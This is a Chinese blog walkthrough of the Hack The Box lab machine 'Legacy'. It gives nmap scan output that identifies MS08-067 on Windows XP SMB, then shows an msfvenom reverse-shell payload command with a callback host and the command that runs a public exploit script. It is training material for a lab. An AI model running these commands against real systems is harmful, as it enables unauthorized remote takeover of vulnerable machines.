Hack The Box::Legacy

最新推荐文章于 2023-01-29 18:27:15 发布
最新推荐文章于 2023-01-29 18:27:15 发布
阅读量109 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127243122
版权

0x00 信息收集

nmap -Pn -sV -T 4 -A 10.10.10.4

Host is up (0.24s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h28m54s, deviation: 2h07m11s, median: -5h58m51s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:6f:81 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-08-02T12:08:21+03:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

只有139、445的服务,基本可以断定是smb的漏洞
使用smb的脚本扫一遍
nmap -Pn -p 139,445 --script=vuln 10.10.10.4

PORT    STATE SERVICE
139/tcp open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: EOF
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

存在ms08-067

0x01 漏洞利用

github寻找相关poc https://github.com/andyacer/ms08_067
根据提示修改poc

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.17 LPORT=5555 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40” -f c -a x86 --platform windows
python2 ms08_067_2018.py 10.10.10.4 6 445

在这里插入图片描述
在这里插入图片描述

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hack the box靶机 Legacy
菜浪马废的博客
05-27 214
MS08067 我还有本MS08067实验室写的书呢 就用这个漏洞吧 考试的时候可以直接试一下永恒之蓝 cat user.txt时 需要用“”包裹住路径 serach -f 文件名 查找文件路径
Hack The Box】windows练习-- legacy
人间体佐菲的博客
10-28 1059
Hack The Box】windows练习-- legacy
No.51-HackTheBox-windows-legacy-Walkthrough渗透学习
qq_34801745的博客
02-11 871
** VulnHub-hackNos: Os-hackNos-3-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines 靶机难度:容易(2.4/10) 靶机发布日期:2017年10月10日 靶机描述: Prepared By: Alexander Reid (Arrexel) Machine Author: ch4p Classif...
漏洞发现思想及工具
m0_62619269的博客
05-30 483
操作系统漏洞 goby goby下载:https://cn.gobies.org/ goby的官方文档:https://cn.gobies.org/docs.html 下载之后是一个压缩包,解压后目录下有一个Goby.exe文件 下载完成后,打开goby是如下界面: goby的使用比较友好,在点击右上角的+号,输入IP或者域名,选择需要扫描的端口和需要验证的POC即可开始扫描 goby内置了许多的插件,在goby的插件中心可以下载这边插件并使用,下载的时候需要挂代理,不然可能无法加载出来。 Ne
htb-bastion
qq_45766062的博客
02-22 633
bastion介绍 这是一个运行windows的机器,并且可以连ssh。 nmap 先是nmap扫一下: Nmap scan report for 10.10.10.134 Host is up (0.32s latency). Not shown: 994 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (proto
MatterOverdrive-Legacy-Edition:科幻Minecraft Mod
02-04
于是,Mod(模组)应运而生,其中"MatterOverdrive:Legacy Edition"是一款备受瞩目的科幻主题Mod,为玩家带来了全新的挑战和乐趣。 "MatterOverdrive:Legacy Edition"专为Minecraft 1.12.2版本设计,它将游戏带入...
core.legacy:核
06-11
"core.legacy:核"是针对PHP编程语言的一个核心组件,它主要包含了基础的类、抽象类和接口,用于构建应用程序的基础架构。这个组件通常是为了兼容旧版本的PHP或者为项目提供一个稳定的底层支持。在深入理解这个核心库...
Legacy:静态网络实验
05-22
在本实验中,我们关注的是"Legacy:静态网络实验",这是一个基于JavaScript、HTML5的技术实践项目,受到了neauoire的启发并利用了其部分库。这个实验的主要目的是探索和理解静态网络页面的构建和功能,同时展示了...
legacy:MolView.org
08-04
it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. MolView is
stak-legacy:堆
05-24
在"stak-legacy-master"这个压缩包中,"master"分支通常代表一个Git仓库的主要分支,意味着这是项目的最新稳定版本。解压后,我们可能会找到如README文件,代码文件夹(可能包含`.php`文件),配置文件,以及测试...
红日靶场02
weixin_55541277的博客
10-06 4543
文章目录红日靶场020、环境搭建一、外网域1.扫描端口2.目录扫描3.Weblogic getshell4.建立MSF会话5.获取hash6.远程桌面连接7. 收集跳板机信息二、内网域0.收集内网信息1. 建立路由,配置代理2. 黄金票据攻击3. 上传木马4. 正向连接5. 获取hash6.远程桌面 红日靶场02 0、环境搭建 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 默认密码:1qaz@WSX 先配通IP, 默认没有开启Web服
项目五linux 内网完整渗透测试实例笔记
qq_56426046的博客
01-29 1724
本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。在 wdcp 生成秘钥保存下来 在 kali 设置权限 600你知道什么叫幸福嘛?幸福就是拍拍手。
HTB Legacy[Hack The Box HTB靶场]writeup系列2
重新启程
02-01 1580
Retired Machines的第二台,前面的靶机都是比较简单的,通常都是适应性的训练,找到合适的突破点就可以了。 目录 0x00 靶场介绍 0x01 端口扫描 0x02 samba服务 0x03永恒之蓝 0x00 靶场介绍 Legacy这台靶机是windows靶机,我们之前在Vulnhub上使用的靶机基本上都是linux操作系统。那么我们就来看看这台靶机是什么情况。 先看下...
Hackthebox walkthrough - Legacy(考点:smb利用 blue)
冬萍子癸水
04-27 591
namp走起可见又是smb。但这次没有像LAME靶机那样直接显示版本号。 于是nmap -p 445 --script vuln 10.10.10.4走一波。用NMAP的脚本扫端口 ok显示 ms08-067是个突破点 上msf,search ms08-067, use exploit/windows/smb/ms08_067_netapi , options, set rhost 10.10...
nmap 扫描常见漏洞
热门推荐
hambaga的博客
11-09 1万+
加上 --script=vuln 参数就可以了 nmap -T4 -A -v 192.168.1.133 --script=vuln 扫描结果,发现了两个可用的漏洞 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 22:51 CST NSE: Loaded 149 scripts for scanning. NSE: Script Pr...
Nmap命令-基础用法
weixin_30949361的博客
04-01 254
Nmap 主机发现扫描 主机发现有时候也叫做 Ping 扫描,但它远远超越用世人皆知的 Ping 工具发送简单的 IcMp 回声请求报文,这些探测的目的是获得响应以显示某个 lP 地址是否是活动的(正在被某主机或者网络设备使用).主机发现能够找到零星分布于 lP 地址海洋上的那些机器. 批量Ping扫描: 批量扫描一个网段的主机存活数. [root@localhost ~]# nmap -sP ...
Open debug mode for Tomcat and use Eclipse to remote debug the application
Bryan's Column
06-25 2028
Today I tried to use remote debugging with Eclipse and Tomcat.I usually use a Tomcat Sysdeo Plugin to run Tomcat inside Eclipse, but today I faced remote debugging.To run tomcat in remote debugging yo
汇编debug调试指令与解析
夜风的博客
09-04 8629
一、win10下debug的环境配置 参考https://ask.dobunkan.com/article-4935.html,安装配置即可,本文主要讲解debug下具体怎么使用。 二、汇编debug常用指令 指令使用示例(不区分大小写): (1)r指令 比如r 查看cpu寄存器的内容 r ax 修改ax寄存器内容,其他寄存器修改类似。 (2)d指令,查看内存内容 (3)u指令,内存的机器...
msf初体验——xp的ms08-067漏洞
boom_99的博客
09-07 2880
msf初体验——xp的ms08-067漏洞 环境: kali2019:192.168.1.128 xp32位:192.168.1.129 都是nat模式 扫描靶机漏洞 1.nmap扫描(不知道目标漏洞名称),个人感觉有点慢,应该是配置太垃圾 nmap --script=vuln 192.168.1.129 nmap扫描报告,扫到两个,ms08-067和ms17-010 Nmap scan report for 192.168.1.129 Host is up (0.00053s.
error: legacy-install-failure
最新发布
05-10
这个错误通常表示在安装某个软件包或模块时发生了一些错误。有几种可能的原因: 1. 安装包不兼容:如果您的操作系统或Python版本与安装包不兼容,可能会导致此错误。请确保您正在使用与软件包要求的操作系统和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值